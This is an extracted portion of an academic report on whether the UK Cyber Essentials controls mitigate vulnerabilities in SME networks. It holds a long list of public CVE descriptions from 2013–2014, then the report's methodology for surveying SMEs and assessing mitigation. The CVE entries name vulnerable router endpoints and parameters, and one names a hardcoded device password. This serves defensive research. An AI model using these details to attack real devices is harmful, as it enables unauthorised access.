CVE-2013-7043: Multiple cross-site request forgery (CSRF) vulnerabilities on Cisco Scientific Atlanta DPR2320R2 routers with software 2.0.2r1262-090417 allow remote attackers to hijack the authentication of administrators for requests that (1) change a password via the Password parameter to goform/RgSecurity, (2) reboot the device via the Restart parameter to goform/restart, (3) modify Wi-Fi settings, as demonstrated by the WpaPreSharedKey parameter to goform/wlanSecurity, or (4) modify parental controls via the ParentalPassword parameter to goform/RgParentalBasic.

CVE-2013-7389: Multiple cross-site scripting (XSS) vulnerabilities in D-Link DIR-645 Router (Rev. A1) with firmware before 1.04B11 allow remote attackers to inject arbitrary web script or HTML via the (1) deviceid parameter to parentalcontrols/bind.php, (2) RESULT parameter to info.php, or (3) receiver parameter to bsc_sms_send.php.

CVE-2014-0001: Buffer overflow in client/mysql.cc in Oracle MySQL and MariaDB before 5.5.35 allows remote database servers to cause a denial of service (crash) and possibly execute arbitrary code via a long server version string.

CYBER SECURITY CONTROLS EFFECTIVENESS — Security Lancaster   Page 22 of 28

CVE-2014-0035: The SymmetricBinding in Apache CXF before 2.6.13 and 2.7.x before 2.7.10, when EncryptBeforeSigning is enabled and the UsernameToken policy is set to an EncryptedSupportingToken, transmits the UsernameToken in cleartext, which allows remote attackers to obtain sensitive information by sniffing the network.

CVE-2014-0160: The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.

CVE-2014-0207: The cdf_read_short_sector function in cdf.c in file before 5.19, as used in the Fileinfo component in PHP before 5.4.30 and 5.5.x before 5.5.14, allows remote attackers to cause a denial of service (assertion failure and application exit) via a crafted CDF file.

CVE-2014-0259: Microsoft Word 2007 SP3 and Office Compatibility Pack SP3 allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability".

CVE-2014-0266: The XMLHTTP ActiveX controls in XML Core Services 3.0 in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to bypass the Same Origin Policy via a web page that is visited in Internet Explorer, aka "MSXML Information Disclosure Vulnerability".

CVE-2014-0294: Microsoft Forefront Protection 2010 for Exchange Server does not properly parse e-mail content, which might allow remote attackers to execute arbitrary code via a crafted message, aka "RCE Vulnerability".

CVE-2014-0313: Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-0321.

CVE-2014-0354: The ZyXEL Wireless N300 NetUSB NBG-419N router with firmware 1.00(BFQ.6)C0 has a hardcoded password of qweasdzxc for an unspecified account, which allows remote attackers to obtain index.asp login access via an HTTP request.

CVE-2014-0362: Cross-site scripting (XSS) vulnerability on Google Search Appliance (GSA) devices before 7.0.14.G.216 and 7.2 before 7.2.0.G.114, when dynamic navigation is configured, allows remote attackers to inject arbitrary web script or HTML via input included in a SCRIPT element.

CVE-2014-0433: Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.13 and earlier allows remote attackers to affect availability via unknown vectors related to Thread Pooling.

CVE-2014-0488: APT before 1.0.9 does not "invalidate repository data" when moving from an unauthenticated to authenticated state, which allows remote attackers to have unspecified impact via crafted repository data.

CVE-2014-0493: Adobe Reader and Acrobat 10.x before 10.1.9 and 11.x before 11.0.06 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-0495.

CVE-2014-0494: Adobe Digital Editions 2.0.1 allows attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via unspecified vectors.

CVE-2014-0498: Stack-based buffer overflow in Adobe Flash Player before 11.7.700.269 and 11.8.x through 12.0.x before 12.0.0.70 on Windows and Mac OS X and before 11.2.202.341 on Linux, Adobe AIR before 4.0.0.1628 on Android, Adobe AIR SDK before 4.0.0.1628, and Adobe AIR SDK & Compiler before 4.0.0.1628 allows attackers to execute arbitrary code via unspecified vectors.

CVE-2014-0515: Buffer overflow in Adobe Flash Player before 11.7.700.279 and 11.8.x through 13.0.x before 13.0.0.206 on Windows and OS X, and before 11.2.202.356 on Linux, allows remote attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in April 2014.

CVE-2014-0533: Cross-site scripting (XSS) vulnerability in Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2014-0531 and CVE-2014-0532.

CVE-2014-0536: Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors.

CVE-2014-0562: Cross-site scripting (XSS) vulnerability in Adobe Reader and Acrobat 10.x before 10.1.12 and 11.x before 11.0.09 on OS X allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "Universal XSS (UXSS)".

CVE-2014-0577: Adobe Flash Player before 13.0.0.252 and 14.x and 15.x before 15.0.0.223 on Windows and OS X and before 11.2.202.418 on Linux, Adobe AIR before 15.0.0.356, Adobe AIR SDK before 15.0.0.356, and Adobe AIR SDK & Compiler before 15.0.0.356 allow attackers to execute arbitrary code by leveraging an unspecified "type confusion", a different vulnerability than CVE-2014-0584, CVE-2014-0585, CVE-2014-0586, and CVE-2014-0590.

CVE-2014-0765: Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long GotoCmd argument.

CVE-2014-0767: Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long AccessCode argument.

CVE-2014-0783: Stack-based buffer overflow in BKHOdeq.exe in Yokogawa CENTUM CS 3000 R3.09.50 and earlier allows remote attackers to execute arbitrary code via a crafted TCP packet.

CVE-2014-1330: WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.

CVE-2014-1342: WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.

CVE-2014-1349: Use-after-free vulnerability in Safari in Apple iOS before 7.1.2 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via an invalid URL.

CVE-2014-1356: Heap-based buffer overflow in launchd in Apple iOS before 7.1.2, Apple OS X before 10.9.4, and Apple TV before 6.1.2 allows attackers to execute arbitrary code via a crafted application that sends IPC messages.

CVE-2014-1370: The byte-swapping implementation in copyfile in Apple OS X before 10.9.4 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds memory access and application crash) via a crafted AppleDouble file in a ZIP archive.

CVE-2014-1379: Graphics Drivers in Apple OS X before 10.9.4 allows attackers to gain privileges or cause a denial of service (NULL pointer dereference and system crash) via a 32-bit executable file for a crafted application.

CVE-2014-1382: WebKit, as used in Apple iOS before 7.1.2, Apple Safari before 6.1.5 and 7.x before 7.0.5, and Apple TV before 6.1.2, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-06-30-1, APPLE-SA-2014-06-30-3, and APPLE-SA-2014-06-30-4.

CVE-2014-1466: SQL injection vulnerability in CSP MySQL User Manager 2.3 allows remote attackers to execute arbitrary SQL commands via the login field of the login page.

CVE-2014-1472: Multiple cross-site scripting (XSS) vulnerabilities in the Enterprise Manager in McAfee Vulnerability Manager (MVM) 7.5.5 and earlier allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.

CVE-2014-1477: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 27.0, Firefox ESR 24.x before 24.3, Thunderbird before 24.3, and SeaMonkey before 2.24 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2014-1518: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 29.0, Firefox ESR 24.x before 24.5, Thunderbird before 24.5, and SeaMonkey before 2.26 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2014-1563: Use-after-free vulnerability in the mozilla::DOMSVGLength::GetTearOff function in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via an SVG animation with DOM interaction that triggers incorrect cycle collection.

CVE-2014-1565: The mozilla::dom::AudioEventTimeline function in the Web Audio API implementation in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 does not properly create audio timelines, which allows remote attackers to obtain sensitive information from process memory or cause a denial of service (out-of-bounds read) via crafted API calls.

CVE-2014-1586: content/base/src/nsDocument.cpp in Mozilla Firefox before 33.0, Firefox ESR 31.x before 31.2, and Thunderbird 31.x before 31.2 does not consider whether WebRTC video sharing is occurring, which allows remote attackers to obtain sensitive information from the local camera in certain IFRAME situations by maintaining a session after the user temporarily navigates away.

CVE-2014-1701: The GenerateFunction function in bindings/scripts/code_generator_v8.pm in Blink, as used in Google Chrome before 33.0.1750.149, does not implement a certain cross-origin restriction for the EventTarget::dispatchEvent function, which allows remote attackers to conduct Universal XSS (UXSS) attacks via vectors involving events.

CVE-2014-1740: Multiple use-after-free vulnerabilities in net/websockets/websocket_job.cc in the WebSockets implementation in Google Chrome before 34.0.1847.137 allow remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to WebSocketJob deletion.

CVE-2014-1744: Integer overflow in the AudioInputRendererHost::OnCreateStream function in content/browser/renderer_host/media/audio_input_renderer_host.cc in Google Chrome before 35.0.1916.114 allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors that trigger a large shared-memory allocation.

CVE-2014-1753: Microsoft Internet Explorer 6 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-1806: The .NET Remoting implementation in Microsoft .NET Framework 1.1 SP1, 2.0 SP2, 3.5, 3.5.1, 4, 4.5, and 4.5.1 does not properly restrict memory access, which allows remote attackers to execute arbitrary code via vectors involving malformed objects, aka "TypeFilterLevel Vulnerability".

CVE-2014-1808: Microsoft Office 2013 Gold, SP1, RT, and RT SP1 allows remote attackers to obtain sensitive token information via a web site that sends a crafted response during opening of an Office document, aka "Token Reuse Vulnerability".

CVE-2014-1811: The TCP implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to cause a denial of service (non-paged pool memory consumption and system hang) via malformed data in the Options field of a TCP header, aka "TCP Denial of Service Vulnerability".

CVE-2014-1812: The Group Policy implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 does not properly handle distribution of passwords, which allows remote authenticated users to obtain sensitive credential information and consequently gain privileges by leveraging access to the SYSVOL share, as exploited in the wild in May 2014, aka "Group Policy Preferences Password Elevation of Privilege Vulnerability".

CVE-2014-2014: imapsync before 1.584, when running with the --tls option, attempts a cleartext login when a certificate verification failure occurs, which allows remote attackers to obtain credentials by sniffing the network.

CVE-2014-2103: Cisco Intrusion Prevention System (IPS) Software allows remote attackers to cause a denial of service (MainApp process outage) via malformed SNMP packets, aka Bug IDs CSCum52355 and CSCul49309.

CVE-2014-2109: The TCP Input module in Cisco IOS 12.2 through 12.4 and 15.0 through 15.4, when NAT is used, allows remote attackers to cause a denial of service (memory consumption or device reload) via crafted TCP packets, aka Bug IDs CSCuh33843 and CSCuj41494.

CVE-2014-2364: Multiple stack-based buffer overflows in Advantech WebAccess before 7.2 allow remote attackers to execute arbitrary code via a long string in the (1) ProjectName, (2) SetParameter, (3) NodeName, (4) CCDParameter, (5) SetColor, (6) AlarmImage, (7) GetParameter, (8) GetColor, (9) ServerResponse, (10) SetBaud, or (11) IPAddress parameter to an ActiveX control in (a) webvact.ocx, (b) dvs.ocx, or (c) webdact.ocx.

CVE-2014-2416: Unspecified vulnerability in the Oracle Data Integrator component in Oracle Fusion Middleware 11.1.1.3.0 allows remote attackers to affect availability via unknown vectors related to Data Quality, a different vulnerability than CVE-2014-2407, CVE-2014-2415, CVE-2014-2417, and CVE-2014-2418.

CVE-2014-2554: OTRS 3.1.x before 3.1.21, 3.2.x before 3.2.16, and 3.3.x before 3.3.6 allows remote attackers to conduct clickjacking attacks via an IFRAME element.

CVE-2014-2643: Unspecified vulnerability in HP Systems Insight Manager (SIM) before 7.4 allows remote authenticated users to gain privileges via unknown vectors.

CVE-2014-2742: Isode M-Link before 16.0v7 does not properly restrict the processing of compressed XML elements, which allows remote attackers to cause a denial of service (resource consumption) via a crafted XMPP stream, aka an "xmppbomb" attack.

CVE-2014-2768: Microsoft Internet Explorer 6 through 8 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2773.

CVE-2014-2789: Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2795, CVE-2014-2798, and CVE-2014-2804.


CVE-2014-2791: Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-2794: Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2788.

CVE-2014-2808: Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2796, CVE-2014-2825, CVE-2014-4050, CVE-2014-4055, and CVE-2014-4067.

CVE-2014-2821: Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-3444: The GetGUID function in codecs/dmp4.dll in RealNetworks RealPlayer 16.0.3.51 and earlier allows remote attackers to execute arbitrary code or cause a denial of service (write access violation and application crash) via a malformed 3gp file.

CVE-2014-3489: lib/util/miq-password.rb in Red Hat CloudForms 3.0 Management Engine (CFME) before 5.2.4.2 uses a hard-coded salt, which makes it easier for remote attackers to guess passwords via a brute force attack.

CVE-2014-3507: Memory leak in d1_both.c in the DTLS implementation in OpenSSL 0.9.8 before 0.9.8zb, 1.0.0 before 1.0.0n, and 1.0.1 before 1.0.1i allows remote attackers to cause a denial of service (memory consumption) via zero-length DTLS fragments that trigger improper handling of the return value of a certain insert function.

CVE-2014-3556: The STARTTLS implementation in mail/ngx_mail_smtp_handler.c in the SMTP proxy in nginx 1.5.x and 1.6.x before 1.6.1 and 1.7.x before 1.7.4 does not properly restrict I/O buffering, which allows man-in-the-middle attackers to insert commands into encrypted SMTP sessions by sending a cleartext command that is processed after TLS is in place, related to a "plaintext command injection" attack, a similar issue to CVE-2011-0411.

CVE-2014-3580: The mod_dav_svn Apache HTTPD server module in Apache Subversion 1.x before 1.7.19 and 1.8.x before 1.8.11 allows remote attackers to cause a denial of service (NULL pointer dereference and server crash) via a REPORT request for a resource that does not exist.

CVE-2014-3814: The Juniper Networks NetScreen Firewall devices with ScreenOS before 6.3r17, when configured to use the internal DNS lookup client, allows remote attackers to cause a denial of service (crash and reboot) via a sequence of malformed packets to the device IP.

CVE-2014-3819: Juniper Junos 11.4 before 11.4R12, 12.1 before 12.1R10, 12.1X44 before 12.1X44-D35, 12.1X45 before 12.1X45-D25, 12.1X46 before 12.1X46-D20, 12.1X47 before 12.1X47-D10, 12.2 before 12.2R8, 12.3 before 12.3R7, 13.1 before 13.1R4, 13.2 before 13.2R4, 13.3 before 13.3R2, and 14.1 before 14.1R1, when Auto-RP is enabled, allows remote attackers to cause a denial of service (RDP routing process crash and restart) via a malformed PIM packet.

CVE-2014-3872: Multiple SQL injection vulnerabilities in the administration login page in D-Link DAP-1350 (Rev. A1) with firmware 1.14 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) username or (2) password.

CVE-2014-4044: OpenAFS 1.6.8 does not properly clear the fields in the host structure, which allows remote attackers to cause a denial of service (uninitialized memory access and crash) via unspecified vectors related to TMAY requests.

CVE-2014-4079: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4082: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-4100: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4105: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4114: Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to execute arbitrary code via a crafted OLE object in an Office document, as exploited in the wild with a "Sandworm" attack in June through October 2014, aka "Windows OLE Remote Code Execution Vulnerability".

CVE-2014-4127: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-4130: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-4132 and CVE-2014-4138.

CVE-2014-4132: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-4130 and CVE-2014-4138.

CVE-2014-4133: Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-4137.

CVE-2014-4141: Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-4481: Integer overflow in CoreGraphics in Apple iOS before 8.1.3, Apple OS X before 10.10.2, and Apple TV before 7.0.3 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted PDF document.

CVE-2014-4617: The do_uncompress function in g10/compress.c in GnuPG 1.x before 1.4.17 and 2.x before 2.0.24 allows context-dependent attackers to cause a denial of service (infinite loop) via malformed compressed packets, as demonstrated by an a3 01 5b ff byte sequence.

CVE-2014-4631: RSA Adaptive Authentication (On-Premise) 6.0.2.1 through 7.1 P3, when using device binding in a Challenge SOAP call or using the RSA Adaptive Authentication Integration Adapters with Out-of-Band Phone (Authentify) functionality, conducts permanent device binding even when authentication fails, which allows remote attackers to bypass authentication.

CVE-2014-5528: The Appsflyer library for Android does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

CVE-2014-6040: GNU C Library (aka glibc) before 2.20 allows context-dependent attackers to cause a denial of service (out-of-bounds read and crash) via a multibyte character value of "0xffff" to the iconv function when converting (1) IBM933, (2) IBM935, (3) IBM937, (4) IBM939, or (5) IBM1364 encoded data to UTF-8.

CVE-2014-6105: IBM Security Identity Manager 6.x before 6.0.0.3 IF14 allows remote attackers to conduct clickjacking attacks via unspecified vectors.

CVE-2014-6136: IBM Security AppScan Standard 8.x and 9.x before 9.0.1.1 FP1 supports unencrypted sessions, which allows remote attackers to obtain sensitive information by sniffing the network.

CVE-2014-6164: IBM WebSphere Application Server 8.0.x before 8.0.0.10 and 8.5.x before 8.5.5.4 allows remote attackers to spoof OpenID and OpenID Connect cookies, and consequently obtain sensitive information, via a crafted URL.

CVE-2014-6363: vbscript.dll in Microsoft VBScript 5.6 through 5.8, as used with Internet Explorer 6 through 11 and other products, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "VBScript Memory Corruption Vulnerability".

CVE-2014-6369: Microsoft Internet Explorer 9 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-6378: Juniper Junos 11.4 before R12-S4, 12.1X44 before D35, 12.1X45 before D30, 12.1X46 before D25, 12.1X47 before D10, 12.2 before R9, 12.2X50 before D70, 12.3 before R7, 13.1 before R4 before S3, 13.1X49 before D55, 13.1X50 before D30, 13.2 before R5, 13.2X50 before D20, 13.2X51 before D26 and D30, 13.2X52 before D15, 13.3 before R3, and 14.1 before R1 allows remote attackers to cause a denial of service (router protocol daemon crash) via a crafted RSVP PATH message.

CVE-2014-6487: Unspecified vulnerability in the Oracle Identity Manager component in Oracle Fusion Middleware 11.1.1.5, 11.1.1.7, 11.1.2.1, and 11.1.2.2 allows remote authenticated users to affect integrity via unknown vectors related to End User Self Service.

CVE-2014-7250: The TCP stack in 4.3BSD Net/2, as used in FreeBSD 5.4, NetBSD possibly 2.0, and OpenBSD possibly 3.6, does not properly implement the session timer, which allows remote attackers to cause a denial of service (resource consumption) via crafted packets.

CVE-2014-7927: The SimplifiedLowering::DoLoadBuffer function in compiler/simplified-lowering.cc in Google V8, as used in Google Chrome before 40.0.2214.91, does not properly choose an integer data type, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via crafted JavaScript code.

CVE-2014-7945: OpenJPEG before r2908, as used in PDFium in Google Chrome before 40.0.2214.91, allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted PDF document, related to j2k.c, jp2.c, and t2.c.

CVE-2014-8447: Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-8445, CVE-2014-8446, CVE-2014-8456, CVE-2014-8458, CVE-2014-8459, CVE-2014-8461, and CVE-2014-9158.

CVE-2014-8638: The navigator.sendBeacon implementation in Mozilla Firefox before 35.0, Firefox ESR 31.x before 31.4, Thunderbird before 31.4, and SeaMonkey before 2.32 omits the CORS Origin header, which allows remote attackers to bypass intended CORS access-control checks and conduct cross-site request forgery (CSRF) attacks via a crafted web site.

CVE-2014-8835: The xpc_data_get_bytes function in libxpc in Apple OS X before 10.10.2 does not verify that a dictionary's Attributes key has the xpc_data data type, which allows attackers to execute arbitrary code by providing a crafted dictionary to sysmond, related to an "XPC type confusion" issue.

CVE-2014-9159: Heap-based buffer overflow in Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2014-8457 and CVE-2014-8460.

CVE-2014-9163: Stack-based buffer overflow in Adobe Flash Player before 13.0.0.259 and 14.x and 15.x before 15.0.0.246 on Windows and OS X and before 11.2.202.425 on Linux allows attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in December 2014.

CVE-2014-9350: TP-Link TL-WR740N 4 with firmware 3.17.0 Build 140520, 3.16.6 Build 130529, and 3.16.4 Build 130205 allows remote attackers to cause a denial of service (httpd crash) via vectors involving a "new" value in the isNew parameter to PingIframeRpm.htm.

CVE-2014-9357: Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build in a Dockerfile in an LZMA (.xz) archive, related to the chroot for archive extraction.


Survey Responses



Methodology

The scheme of work for this report has been split into the following sections:

• Collection of data through interviews and a survey regarding the implementation and deployment of networks in real-world SMEs, for use in designing paper models to be analysed.

bull Composition of a list of suitablevulnerabilities that contains applicablemethods by which remote attackers canexploit commodity-level attacks

bull Assessment of vulnerability mitigation forSME networks with and without the useof the CE Tools

Data Collection

In order to analyse the effectiveness of the Cyber Essentials Security Tools, four real-world SME networks have been modelled. Models have been composed using information gathered in interviews and abstracted to reduce redundant complexity and remove any linkage with the SME. In addition, a generalisable SME model was composed from survey responses to serve as a baseline network from which all SME networks may be adapted.

Interviews

The interviews were composed with the goal of firstly understanding the layout, or topology, of the network deployed by an SME. To then build on the network configuration, it was important to understand how the network is used: where remote connections take place, how local services are utilised, and how an attacker sees the network. Hardware vendors, operating systems and version numbers were considered to build a greater understanding of the network.

Additional questions were posed to examine the current state of security on the network, such as any security accreditations, previous breaches, and how often updates are rolled out.

Survey

The survey was constructed as a stripped-down questionnaire representing the essence of the questions posed in the interviews. This included details of the number of workstations at the SME (to gauge its size), the local and remote services available, the operating systems used on the service providers and workstations, the current security policies in place, and the respondents' awareness of the CE Scheme.

Two surveys were sent out: one to a secure list of SMEs in the NW Security Cluster[9], and another publicly to closed groups of security-interested SME representatives.

Vulnerabilities

A total of 200 random vulnerabilities have been taken in equal numbers from two annual vulnerability lists, CVE-2013 and CVE-2014, published by Mitre². Any vulnerabilities found to be unsuitable for analysis have been replaced by a new candidate.

In this report we use the Mitre organisation's definition of a vulnerability, which they state as:

"An information security 'vulnerability' is a mistake in software that can be directly used by a hacker to gain access to a system or network. CVE considers a mistake a vulnerability if it allows an attacker to use it to violate a reasonable security policy for that system (this excludes entirely 'open' security policies in which all users are trusted, or where there is no consideration of risk to the system)."

(As shown on Mitre.org's Terminology page[6] in March '15)

² CVE is sponsored by US-CERT in the office of Cybersecurity and Communications at the US Department of Homeland Security.

Figure 3: Methodology for Assessing Cyber Essentials

To warrant a CVE entry in the Mitre list, individual vulnerabilities must place the affected system (or systems) into a state which either:

• allows an attacker to execute commands as another user;

• allows an attacker to access data that is contrary to the specified access restrictions for that data;

• allows an attacker to pose as another entity; or

• allows an attacker to conduct a denial of service.

High-Profile Vulnerabilities

Three specific high-profile vulnerabilities were also taken in addition to the randomly chosen 200, and have been assessed to determine to what extent the Cyber Essentials scheme would affect the vulnerability of SMEs in these situations.

Additionally, the applicability of these vulnerabilities to the SME networks we studied is included, along with the respective potential to harm operations.

Mitigation Assessment

The vulnerabilities chosen have been qualitatively assessed for mitigation with and without the use of the Cyber Essentials controls. The process considers each component of the controls in asserting whether each vulnerability would be mitigated, partially mitigated or not mitigated. The results are double-vetted to ensure correctness.

For each of the SMEs interviewed, each of the vulnerabilities is assessed for applicability to that network configuration. In cases where the vulnerability is for a specific model of hardware, the network is deemed applicable if it uses a like-product from the same vendor. In cases where the vulnerability is in software, only those referencing software in use, or likely in use (based on the SME's practice), are deemed applicable to the network.


Analysis

The analysis of data collected has been split into sections. Firstly, each of the vulnerabilities has been assessed to ascertain their mitigation with and without the use of the Cyber Essentials controls; this supposes a case where any software or hardware source of a vulnerability is in use (i.e. a worst-case, fully inclusive assessment).

What follows is an analysis of the information gathered from interviews. Four SMEs from distinct industries are detailed in physical infrastructure and service usage, as well as current user access policies and existing security measures in place. A summary of the mitigation results for vulnerabilities in software and hardware used for each SME network configuration is included.

The full table for the applicability of all CVE vulnerabilities to each of the network structures can be found in the CVE Details section on page 19.

Finally, the data collected from the survey is analysed and used to develop a general-case network model; the SME networks are compared to this to better understand the nuances of each market sector, as well as the overall typical configuration of SMEs.

Full Vulnerabilities Assessment

